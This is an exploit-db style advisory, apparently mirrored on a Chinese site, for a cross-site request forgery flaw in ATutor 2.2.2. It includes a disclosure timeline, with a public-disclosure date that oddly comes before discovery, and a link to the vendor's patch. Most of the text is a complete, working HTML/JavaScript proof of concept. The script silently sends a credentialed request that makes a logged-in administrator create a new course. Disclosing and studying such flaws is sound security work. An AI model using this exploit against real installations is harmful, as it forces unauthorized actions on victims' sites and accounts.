ATutor 2.2.2 – Cross-Site Request Forgery (Add New Course)

  • 作者: Saravana Kumar
    日期: 2016-11-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40755/
  • # Exploit Title: ATutor_2.2.2 Learning Management System 
# Cross-Site Request Forgery (Add New Course)
# Date: 13-11-2016
# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
# Vendor: http://www.atutor.ca/
# Exploit Author: Saravana Kumar
# Contact: https://facebook.com/06saravanakumar
# Category: webapps
# Version: 2.2.2
# Platform: PHP
# Tested on: [Kali Linux 2.0 | Windows 7]
# Email: 06saravanakumar@gmail.com
# Affected URL:
http://localhost/ATutor/mods/_core/courses/users/create_course.php

==================================
Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure

########################### CSRF PoC ###############################
 
<html>
 <------ CSRF POC ------>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281");
xhr.withCredentials = true;
var body = "-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"form_course\"\r\n" + 
"\r\n" + 
"true\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + 
"\r\n" + 
"819200\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"course\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"old_access\"\r\n" + 
"\r\n" + 
"protected\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"created_date\"\r\n" + 
"\r\n" + 
"2016-11-07 06:55:20\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"show_courses\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"current_cat\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"title\"\r\n" + 
"\r\n" + 
"Programming Language\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"pri_lang\"\r\n" + 
"\r\n" + 
"en\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"description\"\r\n" + 
"\r\n" + 
"Python\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"category_parent\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"content_packaging\"\r\n" + 
"\r\n" + 
"top\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"rss\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"access\"\r\n" + 
"\r\n" + 
"protected\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"release_date\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"day_release\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"month_release\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"year_release\"\r\n" + 
"\r\n" + 
"2016\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"hour_release\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"min_release\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"end_date\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"day_end\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"month_end\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"year_end\"\r\n" + 
"\r\n" + 
"2017\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"hour_end\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"min_end\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"setvisual\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"banner\"\r\n" + 
"\r\n" + 
"\x3cp\x3eCan fill content what ever you want.\x3c/p\x3e\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"initial_content\"\r\n" + 
"\r\n" + 
"1\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"quota\"\r\n" + 
"\r\n" + 
"-2\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"filesize\"\r\n" + 
"\r\n" + 
"-3\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"tracking\"\r\n" + 
"\r\n" + 
"\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"copyright\"\r\n" + 
"\r\n" + 
"\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"boolForce\"\r\n" + 
"\r\n" + 
"\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"icon\"\r\n" + 
"\r\n" + 
"\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + 
"\r\n" + 
"819200\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"customicon\"; filename=\"\"\r\n" + 
"Content-Type: application/octet-stream\r\n" + 
"\r\n" + 
"\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"custOptCount\"\r\n" + 
"\r\n" + 
"0\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"courseId\"\r\n" + 
"\r\n" + 
"\r\n" + 
"-----------------------------34481053430281\r\n" + 
"Content-Disposition: form-data; name=\"submit\"\r\n" + 
"\r\n" + 
"Save\r\n" + 
"-----------------------------34481053430281--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i); 
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
 <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

---------------------------------------------------------------------------
 
Solution:
 
Patch is available. Install patch using the ATutor Patcher.

Link to download patch:

http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
---------------------------------------------------------------------------